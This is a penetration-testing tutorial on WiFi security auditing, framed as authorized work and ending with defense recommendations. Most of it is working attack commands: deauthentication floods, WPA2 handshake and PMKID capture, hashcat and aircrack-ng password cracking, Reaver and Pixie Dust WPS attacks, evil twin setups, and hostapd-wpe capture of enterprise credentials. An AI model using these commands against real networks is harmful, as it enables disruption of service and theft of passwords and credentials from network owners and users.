Ethical Hacking #wireless-security#wpa2#wifi-hacking

Wireless Network Security Auditing Guide

Go beyond the basics with WPA2/WPA3 auditing, 4-way handshake capture, PMKID attacks, WPS vulnerabilities, evil twin concepts, and enterprise WiFi security.

7 min read

Wireless network security auditing is a critical component of any comprehensive penetration test. Most organizations have WiFi networks, and poorly secured wireless access creates an entry point that bypasses expensive perimeter defenses entirely. This guide covers the technical depth of WiFi auditing from WPA2 handshake capture to WPA3 limitations and enterprise network testing.

Legal reminder: WiFi auditing without explicit written authorization is illegal under computer fraud laws in virtually every jurisdiction. Only audit networks you own or have documented permission to test.

Equipment Requirements

Not every wireless adapter supports monitor mode and packet injection — the two capabilities required for WiFi auditing.

Recommended adapters for auditing:

  • Alfa AWUS036ACH — AC1200, monitor mode, injection support, widely used
  • Alfa AWUS036ACS — AC600, compact, excellent compatibility
  • Panda PAU09 — Budget option, reliable monitor mode
  • Hak5 WiFi Coconut — 14 simultaneous radios, ideal for channel monitoring

Check your adapter’s capabilities:

iw list | grep -A 10 "Supported interface modes"

You need to see monitor in the list.

WPA2 vs WPA3: What Changed

Understanding the protocol differences informs which attacks apply.

FeatureWPA2-PSKWPA3-SAE
Key Exchange4-Way Handshake (EAPOL)Simultaneous Authentication of Equals (SAE/Dragonfly)
Offline crackingYes — capture handshake, crack offlineNo — SAE uses PAKE, no offline cracking
PMKID attackYesNo (different key derivation)
Forward secrecyNoYes
Deauth attacksEffectiveProtected Management Frames mitigates
Dictionary attacksViable against weak PSKsNot possible offline

WPA3 is significantly more resistant to password-based attacks. In practice, many WPA3 networks also support WPA2 in “transition mode” for compatibility — meaning WPA2 attacks still work against the WPA2 BSS.

Setting Up Monitor Mode

# Check wireless interfaces
iwconfig
ip link show

# Enable monitor mode
sudo airmon-ng start wlan0

# Check for interfering processes
sudo airmon-ng check kill

# Verify monitor mode is active
iwconfig wlan0mon

The interface is now wlan0mon (or wlan0 in monitor mode depending on the driver).

Reconnaissance: Scanning for Networks

sudo airodump-ng wlan0mon

The output shows:

BSSID              PWR  Beacons    #Data  CH   MB   ENC CIPHER  AUTH ESSID
AA:BB:CC:DD:EE:FF  -45       89      123   6  130   WPA2 CCMP   PSK  TargetNetwork
11:22:33:44:55:66  -72       12        2  11  130   WPA3 CCMP   SAE  HomeWifi

Focus on:

  • ENC: WPA2-PSK targets for handshake capture
  • AUTH: PSK (pre-shared key) vs MGT (enterprise/802.1X)
  • CH: Channel — lock to target’s channel for capture
  • PWR: Signal strength (higher = closer)

4-Way Handshake Capture

The 4-way handshake occurs when a client authenticates to an access point. Once captured, the handshake can be used to verify password guesses offline.

Passive Capture (Wait for Client)

sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Flags:

  • -c 6 — Lock to channel 6 (the target AP’s channel)
  • --bssid AA:BB:CC:DD:EE:FF — Filter to target AP only
  • -w capture — Write to files named capture-01.cap, etc.

Wait for a client to connect or reconnect. When a handshake is captured, airodump-ng displays WPA handshake: AA:BB:CC:DD:EE:FF in the top right.

Active Deauthentication Attack

Force clients to reconnect by sending deauthentication frames:

# Deauth all clients from the AP
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Deauth a specific client
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
  • -0 10 — Send 10 deauth frames (0 for continuous)
  • -a — AP BSSID
  • -c — Client MAC address (optional; omit to deauth all)

The deauthed clients will reconnect, and airodump-ng will capture the handshake.

WPA3 note: WPA3 networks with Protected Management Frames (PMF/802.11w) will not disconnect on receiving deauth frames from an unauthorized source.

Cracking the Handshake

With capture-01.cap captured, crack it with aircrack-ng:

aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt

Or with hashcat (faster with GPU):

# Convert to hashcat format
hcxpcapngtool -o capture.hc22000 capture-01.cap

# Crack with hashcat mode 22000
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

Mode 22000 handles both WPA2 handshakes and PMKID in a unified format.

PMKID Attack

The PMKID attack (discovered by Jens Steube in 2018) allows capturing an authenticatable hash from a single EAPOL frame from the AP — no client required, and no need to wait for anyone to connect.

The PMKID is computed as:

PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AP_MAC || Client_MAC)

Capture with hcxdumptool

# Capture PMKID from all access points
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1

# Target a specific AP
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --filterlist_ap=target_bssid.txt --filtermode=2

Convert and Crack

hcxpcapngtool -o pmkid.hc22000 pmkid_capture.pcapng
hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt

The PMKID attack is faster to set up than handshake capture since you don’t need to wait for clients, but not all access points send PMKIDs.

WPS Vulnerabilities and Reaver

WPS (Wi-Fi Protected Setup) has a fundamental design flaw in PIN mode: the 8-digit PIN is validated in two halves, reducing the effective keyspace from 10^8 to 10^4 + 10^3 = 11,000 combinations — trivially brute-forceable.

Checking for WPS

sudo wash -i wlan0mon

Output shows WPS-enabled networks and whether they’re locked (WPS Locked = 1 means Reaver attacks will likely fail).

Reaver WPS PIN Attack

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Key flags:

  • -vv — Verbose output
  • -d 1 — Delay between attempts (seconds)
  • -t 5 — Timeout per attempt
  • --no-associate — Don’t attempt to associate (use with pixiewps)
# With rate limiting for cautious approach
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 2 -t 10

Pixie Dust attack — Much faster than brute-force, exploits weak random number generation in some AP chipsets:

sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vv

Modern routers with WPS lockout after 3–5 failures resist Reaver. Many enterprise-grade APs have WPS disabled entirely.

Evil Twin Attack Concepts

An evil twin is a rogue access point with the same SSID as a legitimate network. When clients auto-connect (using saved networks), their traffic is routed through the attacker’s device.

The general setup involves:

  1. Rogue AP: Create an open (or WPA2) access point with the same SSID as the target
  2. Deauth target AP: Force clients to disconnect from the legitimate AP
  3. Client connects: Clients auto-connect to your evil twin
  4. Captive portal or MITM: Intercept credentials or traffic

Tools for evil twin setups:

  • hostapd-wpe: Creates a rogue AP that captures enterprise (PEAP/LEAP) credentials
  • airbase-ng: Part of the aircrack-ng suite for creating software APs
  • Bettercap: Full-featured network attack framework with evil twin capabilities
  • WiFi-Pumpkin: Framework specifically for rogue AP attacks

Evil twin attacks are particularly effective against enterprise networks using PEAP, where clients may accept rogue certificates and send their NetNTLM credentials.

Enterprise WiFi Security (802.1X)

Enterprise networks use 802.1X with a RADIUS server for authentication rather than a shared password. Each user authenticates with their own credentials.

PEAP/MSCHAPv2 Vulnerabilities

PEAP (Protected EAP) tunnels MSCHAPv2 inside TLS. The weakness: clients that don’t validate the server certificate will connect to any RADIUS server, including a rogue one.

hostapd-wpe creates a rogue RADIUS server that captures MSCHAPv2 challenges and responses:

sudo hostapd-wpe hostapd-wpe.conf

Captured hashes look like:

username: DOMAIN\jsmith
challenge: 4f2e4f2e4f2e4f2e
response: a87d123456789012a87d123456789012a87d12345678

Crack with asleap or hashcat (mode 5500 for NetNTLMv1):

hashcat -m 5500 netntlm_hashes.txt /usr/share/wordlists/rockyou.txt

Enterprise Defense Recommendations

  • Certificate validation: Configure clients to validate the RADIUS server certificate against a specific CA
  • Certificate pinning: Pin to a specific certificate, not just any certificate from a trusted CA
  • EAP-TLS: Use mutual certificate authentication instead of password-based PEAP — eliminates credential capture attacks entirely
  • Disable WPS: Turn it off on all access points
  • WPA3-Enterprise: Upgrade to WPA3-Enterprise with 192-bit security mode for sensitive environments

Wireless auditing reveals misconfigurations that firewalls and endpoint controls can never compensate for. A strong WiFi password (20+ random characters), disabled WPS, validated certificate-based authentication, and WPA3 where possible forms the foundation of a defensible wireless posture.

#network-auditing #airodump-ng #wifi-hacking #wpa2 #wireless-security

// related articles

ethical-hacking EternalBlue MS17-010 Explained: Exploit and Defense Guide 7 min read ethical-hacking Evil-WinRM: Windows Remote Management for Pentesters 7 min read ethical-hacking FFUF Web Fuzzing Complete Guide for Pentesters 7 min read